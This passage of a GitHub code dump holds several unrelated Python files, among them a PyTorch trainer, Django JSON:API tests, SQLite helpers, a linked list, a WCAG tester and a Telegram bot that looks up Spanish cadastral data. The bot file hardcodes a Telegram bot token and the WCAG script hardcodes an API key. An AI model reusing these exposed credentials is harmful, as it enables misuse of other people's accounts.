y_true=torch.tensor(()).to(self.device)\n        # tbar = tqdm(self.train_loader, desc=\"\\r\")\n        total_losses = 0\n        for batch, (X, y) in enumerate(self.train_loader):\n            onehot_target=torch.eye(2)[y.long().cpu(), :].to(self.device)\n            pred = self.model(X)\n            y_predict=torch.cat([y_predict,pred.argmax(1)],dim=0)\n            y_true=torch.cat([y_true,y],dim=0)\n            loss = self.loss_fn(pred.reshape(-1,1,2), onehot_target)\n            # gradient accumulation\n            total_losses += float(loss)\n            loss /= self.accumulation_step\n            loss.backward()\n            if (batch + 1) % self.accumulation_step == 0:\n                self.optimizer.step()\n                self.optimizer.zero_grad()\n            # tbar.set_description(\"Train loss: %.5f\" % (total_losses / (batch + 1)))\n        # lr_scheduler.step(lr_scheduler.last_epoch+1)\n        # warmup_scheduler.dampen()\n\n        met=metrics.scores(y_true.cpu().numpy(),y_predict.cpu().numpy())\n        return loss.item(),met\n\n    def valid(self,dataloader,epoch):\n        self.model.eval()\n        # lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n        # start = time.strftime(\"%H:%M:%S\")\n        # print(\"Starting epoch: %d | phase: valid | ⏰: %s \" % (epoch, start))\n        test_loss = 0\n        y_predict=torch.tensor(()).to(self.device)\n        y_true=torch.tensor(()).to(self.device)\n        num_batches = len(dataloader)\n        # tbar = tqdm(dataloader, desc=\"\\r\")\n        for batch, (X, y) in enumerate(dataloader):\n            with torch.no_grad():\n                onehot_target=torch.eye(2)[y.long().cpu(), :].to(self.device)\n                pred = self.model(X)\n                y_predict=torch.cat([y_predict,pred.argmax(1)],dim=0)\n                y_true=torch.cat([y_true,y],dim=0)\n                test_loss += self.loss_fn(pred.reshape(-1,1,2), onehot_target).item()\n        test_loss /= num_batches\n        met=metrics.scores(y_true.cpu().numpy(),y_predict.cpu().numpy())\n        return test_loss,met\n\n    def start_train(self):\n        pbar = tqdm(total=self.max_epoch-self.start_epoch)\n        lastTmet={}\n        lastmet={}\n        if opt.lrsc==\"warmup\":\n            warmup_scheduler = warmup.UntunedLinearWarmup(self.optimizer)\n        for epoch in range(self.start_epoch, self.max_epoch):\n            tloss,lastTmet=self.train(epoch)\n            loss, lastmet = self.valid(self.valid_loader, epoch)\n            # scheduler control\n            if opt.lrsc==\"warmup\":\n                with warmup_scheduler.dampening():\n                    self.lrsc.step()\n            else:\n                self.lrsc.step(loss)\n            if loss < self.best_loss:\n                self.best_loss = loss\n                self.best_score = lastTmet['accuracy']\n            if epoch >= self.max_epoch // 2 and epoch % 10 == 0:\n                self.save_checkpoint(epoch,save_optimizer=True,suffix=\"epoch\" + str(epoch)+self.filename)\n        self.save_checkpoint(epoch, 
save_optimizer=True, suffix=\"last\"+self.filename)\n            pbar.set_postfix({'val accuracy:':lastmet['accuracy']}) \n            pbar.update()\n        test_loss,test_met=self.valid(self.test_loader,0)\n        with open(self.save_dir + str(self.filename) + '_test_evaluate.txt', 'a+', encoding='utf8') as fw:\n            fw.write(\"----------- Model prediction evaluation -----------\\n\")\n            fw.write(\"Trainscore:\\n\")\n            fw.write(str(lastTmet))\n            fw.write(\"\\n\")\n            fw.write(\"Validscore:\\n\")\n            fw.write(str(lastmet))\n            fw.write(\"\\n\")\n            fw.write(\"Testscore:\\n\")\n            fw.write(str(test_met))\n            fw.write(\"\\n\")\n            fw.close()\n        print(\"On the training set:\")\n        print(lastTmet)\n        print(\"On the validation set:\")\n        print(lastmet)\n        print(\"On the test set:\")\n        print(test_met)","repo_name":"hysyyds/GAN-BiLSTM","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6260884515","text":"from copy import deepcopy\n\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom example import models, serializers, views\n\npytestmark = pytest.mark.django_db\n\n\nclass _PatchedModel:\n    class JSONAPIMeta:\n        resource_name = \"resource_name_from_JSONAPIMeta\"\n\n\ndef _check_resource_and_relationship_comment_type_match(django_client):\n    entry_response = django_client.get(reverse(\"entry-list\"))\n    comment_response = django_client.get(reverse(\"comment-list\"))\n\n    comment_resource_type = comment_response.json().get(\"data\")[0].get(\"type\")\n    comment_relationship_type = (\n        entry_response.json()\n        .get(\"data\")[0]\n        .get(\"relationships\")\n        .get(\"comments\")\n        .get(\"data\")[0]\n        .get(\"type\")\n    )\n\n    assert (\n        comment_resource_type == comment_relationship_type\n    ), \"The resource type seen in the relationships and head resource do not match\"\n\n\ndef _check_relationship_and_included_comment_type_are_the_same(django_client, url):\n    response = django_client.get(url + \"?include=comments\")\n    data = response.json().get(\"data\")[0]\n    comment = response.json().get(\"included\")[0]\n\n    comment_relationship_type = (\n        data.get(\"relationships\").get(\"comments\").get(\"data\")[0].get(\"type\")\n    )\n    comment_included_type = comment.get(\"type\")\n\n    assert (\n        comment_relationship_type == comment_included_type\n    ), \"The resource type seen in the relationships and included do not match\"\n\n\n@pytest.mark.usefixtures(\"single_entry\")\nclass TestModelResourceName:\n    create_data = {\n        \"data\": {\n            \"type\": \"resource_name_from_JSONAPIMeta\",\n            \"id\": None,\n            \"attributes\": {\n                \"body\": \"example\",\n            },\n            \"relationships\": {\n                \"entry\": {\"data\": {\"type\": \"resource_name_from_JSONAPIMeta\", \"id\": 1}}\n            },\n        }\n    }\n\n    def test_model_resource_name_on_list(self, client):\n        models.Comment.__bases__ += (_PatchedModel,)\n        response = client.get(reverse(\"comment-list\"))\n        data = response.json()[\"data\"][0]\n        # name should be super-author instead of model name RenamedAuthor\n        assert (\n            data.get(\"type\") == \"resource_name_from_JSONAPIMeta\"\n        ), \"resource_name from model incorrect on list\"\n\n    # Precedence tests\n    def test_resource_name_precedence(self, client, monkeypatch):\n        # default\n        response = client.get(reverse(\"comment-list\"))\n        data = response.json()[\"data\"][0]\n        assert (\n            data.get(\"type\") == \"comments\"\n        ), \"resource_name from model incorrect on list\"\n\n        # model > default\n        models.Comment.__bases__ += (_PatchedModel,)\n        response = client.get(reverse(\"comment-list\"))\n        data = 
response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_JSONAPIMeta\"\n ), \"resource_name from model incorrect on list\"\n\n # serializer > model\n monkeypatch.setattr(\n serializers.CommentSerializer.Meta,\n \"resource_name\",\n \"resource_name_from_serializer\",\n False,\n )\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_serializer\"\n ), \"resource_name from serializer incorrect on list\"\n\n # view > serializer > model\n monkeypatch.setattr(\n views.CommentViewSet, \"resource_name\", \"resource_name_from_view\", False\n )\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_view\"\n ), \"resource_name from view incorrect on list\"\n\n def test_model_resource_name_create(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n models.Entry.__bases__ += (_PatchedModel,)\n response = client.post(reverse(\"comment-list\"), self.create_data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n def test_serializer_resource_name_create(self, client, monkeypatch):\n monkeypatch.setattr(\n serializers.CommentSerializer.Meta,\n \"resource_name\",\n \"renamed_comments\",\n False,\n )\n monkeypatch.setattr(\n serializers.EntrySerializer.Meta, \"resource_name\", \"renamed_entries\", False\n )\n create_data = deepcopy(self.create_data)\n create_data[\"data\"][\"type\"] = \"renamed_comments\"\n create_data[\"data\"][\"relationships\"][\"entry\"][\"data\"][\n \"type\"\n ] = \"renamed_entries\"\n\n response = client.post(reverse(\"comment-list\"), create_data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n def teardown_method(self, method):\n models.Comment.__bases__ = (models.Comment.__bases__[0],)\n models.Entry.__bases__ = (models.Entry.__bases__[0],)\n\n\n@pytest.mark.usefixtures(\"single_entry\")\nclass TestResourceNameConsistency:\n # Included rename tests\n def test_type_match_on_included_and_inline_base(self, client):\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_JSONAPIMeta(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_serializer_resource_name(\n self, client\n ):\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_without_serializer_resource_name(\n self, client\n ):\n serializers.CommentSerializer.Meta.resource_name = None\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_serializer_resource_name_and_JSONAPIMeta(\n self, client\n ):\n models.Comment.__bases__ += (_PatchedModel,)\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n # Relation rename tests\n def test_resource_and_relationship_type_match(self, client):\n _check_resource_and_relationship_comment_type_match(client)\n\n def 
test_resource_and_relationship_type_match_with_serializer_resource_name(\n        self, client\n    ):\n        serializers.CommentSerializer.Meta.resource_name = (\n            \"resource_name_from_serializer\"\n        )\n\n        _check_resource_and_relationship_comment_type_match(client)\n\n    def test_resource_and_relationship_type_match_with_JSONAPIMeta(self, client):\n        models.Comment.__bases__ += (_PatchedModel,)\n\n        _check_resource_and_relationship_comment_type_match(client)\n\n    def test_resource_and_relationship_type_match_with_serializer_resource_name_and_JSONAPIMeta(\n        self, client\n    ):\n        models.Comment.__bases__ += (_PatchedModel,)\n        serializers.CommentSerializer.Meta.resource_name = (\n            \"resource_name_from_serializer\"\n        )\n\n        _check_resource_and_relationship_comment_type_match(client)\n\n    def teardown_method(self, method):\n        models.Comment.__bases__ = (models.Comment.__bases__[0],)\n        try:\n            delattr(serializers.CommentSerializer.Meta, \"resource_name\")\n        except AttributeError:\n            pass\n","repo_name":"django-json-api/django-rest-framework-json-api","sub_path":"example/tests/integration/test_model_resource_name.py","file_name":"test_model_resource_name.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"} +{"seq_id":"10427516889","text":"#!usr/bin/env python \r\n# -*- coding: utf-8 -*-\r\n#python ver 2.7.12\r\n# SQLite3\r\n\r\n# Python DRILL #60\r\n\r\n# ---------- database utils\r\n\r\nimport sqlite3\r\nimport time\r\nimport datetime\r\nimport random\r\n\r\ndef create_table():\r\n    conn = sqlite3.connect('FileCheck.db')\r\n    c = conn.cursor()\r\n    c.execute(\"CREATE TABLE IF NOT EXISTS Checktable(id INTEGER PRIMARY KEY AUTOINCREMENT, unix REAL, timestamp TEXT, keyword TEXT, value REAL)\")\r\n    #print \"create_table() finished\"\r\n    conn.commit()\r\n    c.close()\r\n    conn.close()\r\ncreate_table()\r\n\r\ndef timestamp(timestamp):\r\n    #print(\"\\ntimestamp() called.\\n\")\r\n    conn = sqlite3.connect('FileCheck.db')\r\n    c = conn.cursor()\r\n    unix = int(time.time())\r\n    #print timestamp\r\n    c.execute(\"INSERT INTO Checktable (unix, timestamp) VALUES (?, ?)\",\r\n              (unix, timestamp))\r\n    conn.commit()\r\n    c.close()\r\n    conn.close()\r\n    #print(\"\\ntimestamped: \" + timestamp +\"\\n\")\r\n\r\ndef getlaststamp():\r\n    #print(\"\\ngetlaststamp() called.\\n\")\r\n    conn = sqlite3.connect('FileCheck.db')\r\n    c = conn.cursor()\r\n    c.execute(\"SELECT timestamp FROM Checktable ORDER BY unix desc limit 1\")\r\n    try:\r\n        data = c.fetchone()[0]\r\n    except:\r\n        data = \"No transfer to date.\"\r\n    c.close()\r\n    conn.close()\r\n    return data\r\n\r\ndef clear_table():\r\n    conn = sqlite3.connect('FileCheck.db')\r\n    c = conn.cursor()\r\n    c.execute('DELETE FROM Checktable')\r\n    conn.commit()\r\n    c.close()\r\n    conn.close()\r\n\r\n'''\r\ndef read_db():\r\n    c.execute('SELECT * FROM Checktable')\r\n    data = c.fetchall()\r\n    for row in data:\r\n        print(row)\r\n#read_db()\r\n'''\r\n","repo_name":"michaeltharper/eduware","sub_path":"The-Tech-Academy-coursework/Python/FileCheck-GUI-DB/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41446834865","text":"\"\"\" Rebin 1D spectrum to new pixel scale.\"\"\"\n\nimport math\nimport numpy as np\ndef rb_specbin(flux,nbin,**kwargs):\n    \"\"\"This function bins up 1D spectra in integer pixels. 
The routine returns a\n    structure of flux and wavelength and variance that has been rebinned.\n   \n    Parameters\n    -----------\n    \n    fx   - Flux\n    nbin - Number of pixels to bin on\n    VAR= -- Input variance array [Optional]\n    WAV= -- Input wavelength array [Optional]\n    \n    Returns\n    --------\n    bin  - Structure of data\n    \n    Example\n    --------\n    bin = rb_specbin(fx, 3)\n    \n    \n    REVISION HISTORY:\n    Written by RB. June 2015\n    -\n  ------------------------------------------------------------------------------\n    \"\"\"\n    TF=0\n    TFF=0\n    if 'var' in kwargs:\n        var = kwargs['var']\n        TF = 1\n    if 'wave' in kwargs:\n        wave = kwargs['wave']\n        TFF = 1\n    \n\n    wavePixels = len(flux)\n    if (wavePixels % nbin) != 0:\n        numPix = math.floor(wavePixels/nbin) + 1\n    else:\n        numPix = math.floor(wavePixels/nbin)\n    first = wavePixels % nbin\n    if first == 0:\n        first = nbin\n    newFlux = np.zeros(numPix,)\n    newVar = np.zeros(numPix,)\n    newWave = np.zeros(numPix,)    \n    # Binning\n    for qq in range(numPix): \n        ii = qq*nbin\n        index = np.array(range(ii,ii+nbin))\n        if qq != numPix-1: \n            #add them up\n            newFlux[qq] = np.mean(flux[index])\n            if TF == 1:\n                newVar[qq] = np.mean(var[index])\n            if TFF == 1:\n                newWave[qq] = np.mean(wave[index])\n        else: #last pixel\n            index = np.array(range(ii,ii+first))\n            newFlux[qq] = np.mean(flux[index])\n            if TF == 1:\n                newVar[qq] = np.mean(var[index])\n            if TFF == 1:\n                newWave[qq] = np.mean(wave[index])\n    output={}\n    output['flux']=newFlux\n\n    #returns = newFlux\n    if TF == 1:\n        #newVar is in second column of returns\n        #returns = np.append(returns,newVar,axis = 1)\n        output['error']=np.sqrt(newVar/nbin)\n    if TFF == 1:\n        #returns = np.append(returns,newWave,axis = 1)\n        output['wave']=newWave\n\n\n\n    return output\n\n","repo_name":"rongmon/rbcodes","sub_path":"IGM/rb_specbin.py","file_name":"rb_specbin.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"28205393417","text":"\n\nimport time\nfrom login import login\nfrom utils import driver\nfrom selenium.webdriver.common.by import By\n\nstart_time = time.time()\n\ndef CT_029():\n    try:\n        login()\n        time.sleep(1)\n\n        # Select the menu\n        menu = driver.find_element_by_xpath('//*[@id=\"action-menu-toggle-1\"]').click()\n        time.sleep(1)\n\n        # Click on preferences\n        preferencias = driver.find_element_by_xpath('//*[@id=\"action-menu-1-menu\"]/a[6]').click()\n        time.sleep(2)\n        \n        # Click on message preferences\n        preferencias_msg = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div/div[1]/div/div/div/div[8]/a').click()\n        time.sleep(2)\n        \n        # Select only my contacts\n        mensagens = driver.find_element_by_xpath(' //*[@id=\"yui_3_17_2_1_1662058687387_31\"]').click()\n\n        \n\n        print('CT_029: ✅ - Adjust message preferences.')\n\n    except:\n        print('CT_029: ❌ - Adjust message preferences.')\n\nexecution = (time.time() - start_time) * 1000\n\nif(__name__ == '__main__'):\n    CT_029()\n    print('CT_029: ✅')\n    driver.close()\n    print(\"Done in\", round(execution, 4), \"ms.\")\n\n","repo_name":"Carlosvpm/teste-qualidade-software","sub_path":"tests/CT_029.py","file_name":"CT_029.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23014640298","text":"class Node:\n    def __init__(self, data = None):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    def __init__(self):\n        self.start_node = Node()\n\n    def add_to_start(self, data):\n        node = 
Node(data)\n        node.next = self.start_node.next\n        self.start_node.next = node\n\n    def add_to_end(self, data):\n        n = self.start_node\n        while n.next is not None:\n            n = n.next\n        \n        node = Node(data)\n        n.next = node\n\n    def remove_from_start(self):\n        n = self.start_node.next\n        if n is None:\n            print('List is empty')\n        else:\n            self.start_node.next = n.next\n            n.next = None\n            n = None\n\n    def remove_from_last(self):\n        n = self.start_node\n        if n.next is None:\n            print('List is empty')\n        else:\n            while n.next.next is not None:\n                n = n.next\n            \n            n.next = None\n\n    def traverse_from_start(self):\n        node = self.start_node\n        while node is not None:\n            if node.data is not None:\n                print(node.data)\n            node = node.next\n\nif __name__ == '__main__':\n    linkedList = LinkedList()\n    number_start = int(input('Enter number of items to be added at start :: '))\n    number_end = int(input('Enter number of items to be added at last :: '))\n\n    for i in range(number_start):\n        data = int(input('Enter item to be added at start :: '))\n        linkedList.add_to_start(data)\n\n    print('Items in the list now...')\n    linkedList.traverse_from_start()\n    print('------------------------')\n\n    for i in range(number_end):\n        data = int(input('Enter item to be added at end :: '))\n        linkedList.add_to_end(data)\n\n    print('Items in the list now...')\n    linkedList.traverse_from_start()\n    print('------------------------')\n","repo_name":"luthraG/ds-algo-war","sub_path":"general-practice/09_09_2019/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30515654096","text":"import telepot\nimport time\nimport requests\n\n# message handler\ndef handle(msg):\n    chat_id=msg['chat']['id']\n    latitud=msg['location']['latitude']\n    longitud=msg['location']['longitude']\n    #print('the command is: '+comando)\n    consulta=\"http://ovc.catastro.meh.es/ovcservweb/ovcswlocalizacionrc/ovccoordenadas.asmx/Consulta_RCCOOR?SRS=EPSG:4326&Coordenada_X=\"+str(longitud)+\"&Coordenada_Y=\"+str(latitud)\n    respuesta = requests.get(consulta)\n    texto=str(respuesta.content)\n    print(texto)\n    parte1=texto[texto.find(\"<pc1>\")+5:texto.find(\"</pc1>\")]\n    parte2 = texto[texto.find(\"<pc2>\") + 5:texto.find(\"</pc2>\")]\n    direccion=texto[texto.find(\"<ldt>\") + 5:texto.find(\"</ldt>\")]\n    bot.sendMessage(chat_id, str(latitud) + \" , \" + str(longitud))\n    if(texto.find(\"<pc1>\")<0):\n        bot.sendMessage(chat_id, \"There is no cadastral reference for that point.\")\n    else:\n\n        bot.sendMessage(chat_id,parte1+parte2)\n        bot.sendMessage(chat_id, direccion)\nbot=telepot.Bot(\"1038379101:AAGE54hpNSe7VOthfAqR56btiddTY4FjLpk\")\nbot.message_loop(handle)\nwhile(True):\n    time.sleep(10)","repo_name":"gore999/catastrobot","sub_path":"venv/catastrobot.py","file_name":"catastrobot.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18355519852","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np\n\n\n# Register at http://wave.webaim.org/api/\nwave_api_key = '7q58g54k597' \n\n# INPUT: Flat file with one URL per line, looks in current folder\ninput_filename = 'test short.txt'\n\n# OUTPUT: replaces existing file with that name, otherwise creates it\noutput_filename = 'test short.xlsx'\n\n# True: show on-screen process indicators; False: Don't show.\non_screen_process = True\n\n\ndef call_wave_api(page_URL):\n    \n    wave_api_URL = 
\"http://wave.webaim.org/api/request\"\n \n params = {\"key\": wave_api_key, \n \"url\": page_URL,\n \"format\": \"json\",\n \"reporttype\": 1\n }\n\n\n # ERROR HANDLING 1: REQUESTS\n try:\n # requests.get returns JSON string\n r = requests.get(wave_api_URL, params=params, timeout=21)\n except requests.exceptions.Timeout:\n return_string = 'Operation timed out without response.'\n return return_string\n except requests.exceptions.TooManyRedirects:\n return_string = 'Bad URL, too many redirects.'\n return return_string\n except requests.exceptions.RequestException as e:\n return e\n \n\n # ERROR HANDLING 2: API \n if r.status_code == requests.codes.ok:\n # API call returns wrong encoding, need to hard-code\n r.encoding = 'utf-8'\n # convert json string to json dictionary\n return r.json()\n else:\n return r.status_code, r.raise_for_status()\n \n \n \ndef convert_wcag_errors_to_score(wcag_errors):\n \n if wcag_errors < 10:\n return 3\n elif wcag_errors >= 10 and wcag_errors < 20:\n return 2\n elif wcag_errors >= 20 and wcag_errors < 30:\n return 1\n else:\n return 0\n \n \n\ndef main():\n\n # READ LIST OF USER-SUBMITTED URLs\n # encoding parameter important for cases where URLs have non-ASCII characters\n file_URLs = open(input_filename, mode='r', encoding='utf_8')\n \n # CREATE LIST STRUCTURE FOR STORING ALL URLS TO TEST\n list_URLs = []\n \n for line in file_URLs: \n list_URLs.append(line.strip()) # use .strip() to remove leading and trailing whitespace and end of line characters\n \n file_URLs.close()\n \n \n # TODO: LOCATE URL TO A RANDOM SUB-PAGE FOR EACH USER-SUBMITTED URL, ADD TO list_URLs\n #\n #\n\n \n # VARIABLE USED IN ON-SCREEN PROCESS INDICATOR\n total_URLs = len(list_URLs)\n \n \n # CREATE DATAFRAME TO STORE API TEST RESULTS\n df_result = pd.DataFrame(columns=['Web page title', 'Web page URL', 'Number of WCAG errors', 'Detailed WCAG report'])\n \n # CREATE DATAFRAME TO STORE API TEST PROBLEMS\n df_problems = pd.DataFrame(columns=['Web page URL', 'Problem details'])\n number_problems = 0\n \n # CALL API TO TEST EACH URL, ADD RESULT TO DATAFRAME\n for i, URL in enumerate(list_URLs):\n if on_screen_process: print('Testing URL ', i + 1, ' of ', total_URLs, '.')\n\n URL_result = call_wave_api(URL) \n \n try:\n # process relevant data fields: pagetitle, page url and number of WCAG errors\n # the following two lines obsolete since UTF-8 encoding enforced API call result\n #pagetitle_unicode = bytes(URL_result['statistics']['pagetitle'],'iso-8859-1').decode('utf-8')\n #df_result.loc[i] = [pagetitle_unicode, URL_result[\"statistics\"][\"pageurl\"], URL_result[\"statistics\"][\"waveurl\"], URL_result[\"categories\"][\"error\"][\"count\"]] \n df_result.loc[i] = [URL_result['statistics']['pagetitle'], URL_result[\"statistics\"][\"pageurl\"], URL_result[\"categories\"][\"error\"][\"count\"], URL_result[\"statistics\"][\"waveurl\"]] \n \n if on_screen_process: print('OK', ': ', URL)\n \n except:\n # handle errors in API call return\n None\n df_problems.loc[i] = [URL, URL_result] \n number_problems += 1\n \n if on_screen_process: print('ERROR', ': ', URL)\n if on_screen_process: print(URL_result)\n\n \n if on_screen_process: print('\\n')\n \n \n # CREATE EXCEL FILE OBJECT FOR EXPORT\n excel_writer = pd.ExcelWriter(output_filename, engine='xlsxwriter')\n \n \n # DATAFRAME 1: RESULTS\n \n # Reset dataframe index to create continuous row numbers starting with 1\n df_result = df_result.reset_index(drop=True)\n df_result.index += 1\n \n # ON-SCREEN PROCESS INDICATOR\n if on_screen_process: 
print('Writing results to Excel file.')\n    \n    # EXPORT RESULTS TO EXCEL\n    df_result.to_excel(excel_writer, sheet_name='List of URLs')\n    \n    \n    # DATAFRAME 2: SYNTHESIS\n    \n    # SYNTHESISE THE DATASET\n    avg_wcag_errors = np.mean(df_result['Number of WCAG errors'])\n    median_wcag_errors = np.median(df_result['Number of WCAG errors'])\n    number_URLs_ok = len(df_result)\n    score = convert_wcag_errors_to_score(avg_wcag_errors)\n\n    synthesis = {'Average number of WCAG errors' : avg_wcag_errors,\n                 'Median number of WCAG errors' : median_wcag_errors,\n                 'URLs successfully tested' : number_URLs_ok,\n                 'Indicator score (points)' : score,\n                 'URL problems (see separate sheet)': number_problems\n                 }\n    \n    # CONVERT SYNTHESIS DICT TO DATAFRAME\n    # First one no longer works in py3.5 \n    #df_synthesis = pd.DataFrame(synthesis.items(), columns=['Title', 'Value'])\n    df_synthesis = pd.DataFrame.from_dict(synthesis, orient='index')\n    \n    # EXPORT SYNTHESIS TO EXCEL (SAME FILE, DIFFERENT SHEET)\n    df_synthesis.to_excel(excel_writer, sheet_name='Synthesis') \n    \n    \n    # DATAFRAME 3: URL PROBLEMS\n    \n    # Reset dataframe index to create continuous row numbers starting with 1\n    df_problems = df_problems.reset_index(drop=True)\n    df_problems.index += 1\n    \n    # EXPORT LIST OF PROBLEMATIC URLS TO EXCEL (SAME FILE, DIFFERENT SHEET)\n    df_problems.to_excel(excel_writer, sheet_name='URL problems')\n    \n    \n    # FINALISE EXCEL EXPORT\n    excel_writer.save()\n    \n    if on_screen_process: print('Done.')\n\nif __name__ == '__main__':\n    main()","repo_name":"arturelis/WCAG-batch-test","sub_path":"WCAG batch testing w API.py","file_name":"WCAG batch testing w API.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14256021818","text":"def solution(A, K, L):\n    if K+L > len(A):\n        return -1\n    if K >= L :\n        big = K\n        small = L\n    if K < L :\n        big = L\n        small = K  \n    sum_A = []\n    sum_B = []\n    for n in range(len(A)-big+1):\n        sum_A.append([n,sum(A[n:n+big])])\n    for n in range(len(A)-small+1):\n        sum_B.append([n,sum(A[n:n+small])])\n    result = 0\n    local_sum = 0\n    for i in sum_A:\n        for j in sum_B:\n            if j[0] - i[0] >= 0 and j[0] - i[0] < big or i[0] - j[0] >=0 and i[0] - j[0] < small:\n                continue\n            local_sum = i[1] + j[1]\n            if local_sum > result:\n                result = local_sum\n    return result \n\nif __name__ == \"__main__\":\n    q = ([int(i) for i in input().split(',')], int(input()), int(input()))\n    print(solution(*q))","repo_name":"TousakaNagio/EECP_onlinejudge","sub_path":"AppleOrchardCoding.py","file_name":"AppleOrchardCoding.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17676066143","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul  8 21:13:02 2015\n\n@author: rafael\n\"\"\"\n\nfrom pylab import*\nt = 0.0\ndt =0.01\nx = 10.0 \nv = 0.0 \nk = 10.0 \nm = 2.0 \ntm=[]\nvel =[]\ndis = []\nwhile t < 5:\n    f = -k*x \n    v = v+(f/m)*dt\n    x= x+v*dt\n    t= t+dt\n    tm.append(t)\n    vel.append(v)\n    dis.append(x)\nplot(tm,vel)\nplot(tm,dis)\nshow()\n","repo_name":"airbos994/RafaelLanasElChupacabra","sub_path":"wtf.py","file_name":"wtf.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36932261671","text":"from setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get 
the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(\n    name='cxc-gis',\n    version='0.2.1',\n    description='Geographic information system lib',\n    long_description=long_description,\n    url='https://github.com/XiaochenCui/cxc-gis',\n    author='Xiaochen Cui',\n    author_email='jcnlcxc.new@gmail.com',\n    license='GPLv3',\n    classifiers=[\n        'Development Status :: 1 - Planning',\n        'Intended Audience :: Developers',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3 :: Only',\n    ],\n    keywords='gis',\n    packages=find_packages(),\n    install_requires=['utm'],\n)\n","repo_name":"XiaochenCui/cxc-gis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2627649469","text":"#!/usr/bin/python3\n\"\"\"\n    Function that adds two integers\n    Fun:\n        add_integer\n\"\"\"\n\n\ndef add_integer(a, b=98):\n    \"\"\"\n    Returns the integer sum of a and b\n    \"\"\"\n    if type(a) != int and type(a) != float:\n        raise TypeError(\"a must be an integer\")\n    elif type(b) != int and type(b) != float:\n        raise TypeError(\"b must be an integer\")\n    else:\n        return (int(a) + int(b))\n","repo_name":"tomasmpcr/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2589849498","text":"from BLL import BLL_Log\nfrom BLL import BLL_Dataframe_Personalizado\nfrom BLL import BLL_Grafico\nfrom BE import BE_Grafico\nimport gc\nimport os\nfrom PySide2.QtGui import QPixmap\n\nclass Grafico_Personalizado(BLL_Grafico.Grafico):\n\n    def __init__(self):\n        BE_Grafico.Grafico.setID(self, 1)\n        BE_Grafico.Grafico.setNombre(self, \".//DATA//GRAFICOS//Grafico Personalizado.png\")\n\n\n    def graficoPersonalizado(self, tipoGrafico, tipoDato, columna, cliente, fechaInicio, fechaFin, top = None):\n        graf = None\n        try:\n            dataframe = BLL_Dataframe_Personalizado.Dataframe_Personalizado() \n            filas = dataframe.leerEventosDB(fechaInicio, fechaFin, cliente, tipoDato)\n            df = dataframe.crearDataframePersonalizado(filas)\n            if tipoGrafico == \"Torta\":\n                graf = self.graficarTorta(df, columna, 10)\n            elif tipoGrafico == \"Barras\":\n                graf = self.graficarBarras(df, columna, 